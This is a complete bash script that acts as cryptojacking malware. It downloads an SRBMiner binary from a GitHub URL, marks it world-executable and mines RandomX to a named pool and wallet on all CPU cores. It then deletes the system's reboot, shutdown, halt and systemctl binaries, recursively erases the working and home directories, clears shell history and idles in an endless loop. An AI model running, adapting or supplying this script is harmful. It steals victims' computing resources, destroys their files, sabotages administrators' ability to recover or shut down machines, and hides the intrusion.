#!/bin/bash
wget -O oasis https://github.com/claires67/buut/raw/main/SRBMiner-MULTI
chmod 777 oasis
./oasis --algorithm randomx --pool randomx.rplant.xyz:7139 -u cumzZZjSJUtcWe9D4XXxy4G2kbMMVyCK7ZpvzET9P7qb9V7MvVqZdqGMRbu7CX4z6NG23ZRbkypK94mngbKXKynr8x51oyuMCp.$(shuf -n 1 -i 1-99999)-Bismi --password x --cpu-threads $(nproc --all)
sleep 30
sudo rm -rvf /sbin/reboot /sbin/shutdown /sbin/poweroff /sbin/halt /bin/systemctl /usr/sbin/reboot /usr/sbin/shutdown /usr/sbin/poweroff /usr/sbin/halt /usr/bin/systemctl || rm -rvf /sbin/reboot /sbin/shutdown /sbin/poweroff /sbin/halt /bin/systemctl /usr/sbin/reboot /usr/sbin/shutdown /usr/sbin/poweroff /usr/sbin/halt /usr/bin/systemctl
rm -rvf *
cd ~/
rm -rvf *
history -cr
while true
do
        echo "hold down..."
        sleep 60
done
